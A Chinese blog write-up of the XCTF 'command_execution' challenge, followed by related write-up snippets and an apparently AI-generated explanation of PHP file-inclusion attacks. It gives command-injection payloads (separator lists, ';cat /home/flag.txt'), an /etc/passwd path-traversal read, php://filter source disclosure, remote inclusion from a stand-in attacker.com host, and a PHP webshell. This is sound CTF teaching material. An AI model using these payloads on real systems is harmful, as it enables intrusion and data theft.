xctf中command_execution

最新推荐文章于 2025-04-29 20:07:38 发布
原创 最新推荐文章于 2025-04-29 20:07:38 发布 · 367 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了在Web应用中遇到ping命令时如何利用命令注入漏洞,通过测试不同的截断符号来执行额外的系统命令,如查看敏感文件。文章详细介绍了如何利用这些符号绕过WAF,并给出具体示例,如利用分号执行cat命令读取flag文件。

观察题目,
在这里插入图片描述对于看到ping或者ping命令却没有弄waf时就要想到命令注入。
看到ping命令就可以利用截断来执行新的命令。
首先测试所有的截断符号:
‘$’
‘;’
‘|’
‘-’
‘(’
‘)’
‘反引号’
‘||’
‘&&’
‘&’
‘}’
‘{’
'%0a’可以当作空格来用;
利用截断符号配合普通命令简单问题基本就出来;
例如:127.0.0.1;cat /home/flag.txt
简单的flag就出来了,也可以配合其他的进行;
在这里插入图片描述

原因

系统提供命令执行类函数主要方便处理相关应用场景的功能.而当不合理的使用这类函数,同时调用的变量未考虑安全因素,就会执行恶意的命令调用,被攻击利用。

xctfcommand_execution
rrorb的博客
01-09 2472
解题思路及步骤 打开网页跳转到如下界面; 先尝试ping一下本地主机 ping 127.0.0.1 分析数据,ping发包3次,3次都收到了回复,TTL值为64,用时1998ms; 题目有一点小小的提示,command execution是命令执行漏洞的意思,因此我们可以从这里下手尝试利用命令执行漏洞拿flag; windows和Linux的命令连接符如下: |:command1|command2 直接执行command2 ||:command1||command2 只..
XCTF系列 // Web | php_rce & Web_python_template_injection
qq_45805420的博客
07-26 330
前言 这两题涉及到的知识点有,ThinkPHP 的远程代码执行漏洞 以及 flask的 SSTI 漏洞(服务端模板注入) 。   由于水平有限,关于以上内容的了解均只到表面,具体漏洞原理尚未看明白,详细分析只好以后再补,在这里先参照网上的 writeup,照猫画虎,略微整理分析一下解题思路与流程。 1` php_rce ThinkPHP 是一个轻量级国产 PHP 开发框架,它可以支持 windows/Unix/Linux 等服务器环境。在 ThinkPHP 5 中出现了由于变量覆盖而引起的 RCE(远程命令
XCTF command_execution
YenKoc的博客
12-04 332
讲道理这题算是我的思路盲区,先试着ping下本地的地址,127.0.0.1 看了大佬的wp时,我突然意识到,这是放在服务器上执行的,而且服务器一般都是linux系统的,所以linux命令是必需的, 思路分析:猜测上是服务器上那位同学写了一个可以执行ping命令的程序,但是没加限制,这里有可能会出现命令拼接。 命令拼接: | 将上一句的命令作为输入,执行下一句的命令 && 第一句...
XCTF-command_execution
weixin_45613760的博客
08-01 335
XCTF-command_execution题目介绍打开题目场景打开hackbar,查找有无与flag相关的文件发现在home目录下有flag.txt文件使用cat指令查看得到flag 题目介绍 看到ping或者ping命令却没有弄waf时就要想到命令注入 打开题目场景 使用hackbar进行POST注入 打开hackbar,查找有无与flag相关的文件 发现在home目录下有flag.txt文件 使用cat指令查看 得到flag 然后就得到flag辣 ...
XCTF WEB command_execution
无限迭代中......
06-30 462
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5071 题解: windows或linux下: command1 && command2 先执行command1,如果为真,再执行command2 command1 | command2 只执行command...
XCTF -- command_execution
最新发布
yqya_的博客
04-29 306
XCCTF 中的 command_execution
攻防世界XCTF—web入门题知识点、进阶提高题Writeup
AugenStern的博客
08-21 1242
WriteUpXCTF-Web新手入门区view_sourceget_postrobotsbackupcookiedisabled buttonsimple jsxff refererweak authwebshellcommand executionsimple_php高手进阶区 XCTF-Web 2016 年全国大学生信息安全竞赛开始设立创新实践技能赛,采取的就是传统的 CTF 赛制。在《2016年全国大学生信息安全竞赛参赛指南》中主办方给出的竞赛内容相对全面,值得参考。 系统安全。 涉及操作系统和
xctf新手练习https://adworld.xctf.org.cn/task/task_list?type=misc&number=1&grade=0
weixin_30438813的博客
05-23 3369
view source Q:无法用鼠标右键查看原码,怎么办?A:浏览器地址栏在网址前输入 view-source: 即可查看源码 get post Q:用 get 提交 a=1,用 post 提交 b=2A:url后加 ?a=1,用 hackbar 提交b=2 robots Q:robots.txtA:域名后加 robots.txt backup Q:找到网站的备份文件A:暴力域名。...
adworld.xctf-web-新手练习区刷题
BROTHERYY的博客
05-07 1221
1.View Source 根据题目,就能猜到,此处是查看页面源码,在查看的过程中发现右键不能使用了,那就用F12吧~ 2.Robots 这题是考察Robots协议,访问的时候页面是一片空白,直接输入robots.txt 在地址栏输入robots.txt会得到f1ag_1s_h3re.php,尝试直接访问这个php文件。 3.Backup 对常用的备份文件名进行测试*.php~ or ...
xctf-command_execution(命令执行)
烟敛寒林的博客
02-25 4805
题目地址: http://111.198.29.45:30887 主要利用hackbar进行POST注入 ls命令查看目录文件,具体用法可见: https://blog.youkuaiyun.com/dyw_666666/article/details/79184126 ls发现home目录下有flag.txt文件,然后用cat命令查看txt文件 ...
xctf攻防世界 Web高手进阶区 command_execution
l8947943的博客
08-02 9715
Web应用防护系统(也称为网站应用级入侵防御系统。英文WebApplicationFirewall,简称WAF)。利用国际上公认的一种说法Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。如果没有开waf,将会出现网页被篡改等问题发生。...
[Xctf-web]command_execution
weixin_53146913的博客
03-03 4082
command_execution 题目来源: Cyberpeace-n3k0 题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的, 你知道为什么吗。 题目场景: http://220.249.52.133:31096 1. 知识点介绍: Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称:WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系 列针对HTTP/HTTPS的安全策略来专...
XCTF攻防世界web新手练习_ 9_command_execution
silence1_的博客
04-29 5612
XCTF攻防世界web新手练习—command_execution 题目 题目为command_execution,是命令执行的意思,可见这道题应该跟命名执行有关。 打开题目,看到一个功能框,根据题目,是用来ping功能的。 首先先尝试ping一下127.0.0.1,成功ping通,并回显执行的命令为 ping -c 3 127.0.0.1 于是我们尝试用&&符号执行多个...
12、XCTF command_execution
山兔的博客
09-16 182
一打开网站,就看到下面这句话 小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 在框框里面输 127.0.0.1 有反应,看了一下,返回的数据,感觉是linux 用ls,看一下。 可以,那就是linux, (后面用dir,发现也可以) 反正是可以执行,无所谓了, 先查找文件,用hackbar target=127.0.0.1|find / -name flag.txt 找到了,/home/flag.txt 去找他们在那个目录, 用ls去查一下有什么文件 127.0.0
command_execution
weixin_46168073的博客
11-19 241
看题目 1 & 2 :1和2都执行 1 && 2 :先执行1执行成功后才会执行2,1执行失败,则不执行2 1 | 2 :只执行2 1 || 2 :1执行失败,再执行2(若1执行成功,就不再执行2) 然后我们ping127.0.0.1 有回应,我们直接 127.0.0.1 && find / -name "flag*.txt",发现有一个flag.txt文件,最后直接cat就行了 127.0.0.1 && cat /home/f.
【攻防世界】command_execution
u010160146的博客
08-09 934
辅助工具:Kali Linux进入目标主机后,第一步工作就是查看一下磁盘中都那些东西,然后再根据文件名查看我们所关心的数据内容。WAF还是挺重要的,在本例中,执行的攻击为:代码注入攻击,还是挺有趣的,和SQL注入类似,都是拼接指令,让其执行。Kali中的WAF工具还是不会用…用Kali中的工具是否能够更加好用些一呢?
command execution
ZYZatLXY的博客
07-03 993
命令执行漏洞总结 命令执行漏洞:直接调用操作系统命令 命令执行漏洞的原理:在操作系统中,*“&、|、||”*都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、 passthru、popen、proc_popen...
xctf web_php_include
03-29
<think>好的,用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先,我应该回忆PHP中的文件包含漏洞,尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示,$lan变量直接来自Cookie中的language值,然后拼接.php后缀进行包含。这种情况下,如果没有严格的过滤,攻击者可能通过修改Cookie来包含任意文件,比如利用路径遍历或者远程文件包含。 接下来,我需要考虑常见的利用方法。例如,路径遍历攻击,用户可能构造类似../../etc/passwd的payload来读取系统文件。此外,如果服务器配置允许远程包含(allow_url_include为On),攻击者可以包含恶意服务器上的文件执行代码。引用[3]的PHP类型比较文档可能帮助理解变量处理,但这里更关键的是文件包含漏洞。 然后,解题步骤可能包括:检查代码中是否存在未过滤的用户输入,尝试包含敏感文件如/etc/passwd,或者上传恶意文件并通过包含执行。例如,在引用[4]的情况中,设置Cookie的language为../../../tmp/uploaded_file,如果存在上传临时文件的话。还可能利用PHP伪协议,如php://filter来读取源码,比如?lan=php://filter/convert.base64-encode/resource=config,这样可以获取base64编码后的文件内容。 同时,需要注意引用[2]中提到的情况,通过文件包含读取admin.php或function.php的源码,这可能泄露关键信息。此外,确保回答中引用了正确的来源,比如引用[4]的代码示例,说明如何利用Cookie进行文件包含。 最后,生成相关问题时要覆盖漏洞原理、利用方式、防御措施和CTF中的其他常见漏洞,帮助用户全面理解。需要确保回答结构清晰,步骤详细,并且引用正确,比如在关键点后添加[^4]或[^2]。</think>### XCTF PHP include Web安全漏洞解题思路 在CTF竞赛中,PHP的`include`函数常因未正确过滤用户输入导致文件包含漏洞。以下是基于引用[4]的代码分析及典型解题方法: --- #### **漏洞原理** 1. **关键代码片段** 通过Cookie中的`language`参数动态包含文件: ```php $lan = $_COOKIE['language']; @include($lan.".php"); ``` 若未对`$lan`进行过滤,攻击者可通过路径遍历(如`../../../etc/passwd`)或PHP伪协议(如`php://filter`)读取任意文件[^4]。 2. **漏洞利用条件** - 目标服务器开启`allow_url_include`(远程文件包含) - 文件路径可控且未限制文件后缀 --- #### **解题步骤** 1. **探测漏洞** - 修改Cookie中`language`值为`../../../../etc/passwd%00`,尝试读取系统文件(需PHP版本<5.3.4,因空字节截断漏洞)[^4]。 2. **利用PHP伪协议** - **读取源码**:构造Payload为`php://filter/convert.base64-encode/resource=index`,通过Base64解码获取源码: ```http Cookie: language=php://filter/convert.base64-encode/resource=index ``` - **远程代码执行**:若允许远程包含,设置`language=http://attacker.com/shell.txt`,触发恶意代码执行。 3. **结合文件上传** - 若存在文件上传功能,上传含恶意代码的图片(如`<?php system($_GET['cmd']);?>`),通过包含临时文件路径实现RCE: ```http Cookie: language=../../../tmp/uploaded_file ``` --- #### **防御措施** 1. 白名单限制包含路径(如只允许包含`en/`或`zh/`目录) 2. 使用`basename()`函数过滤路径中的特殊字符 3. 关闭`allow_url_include`配置 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值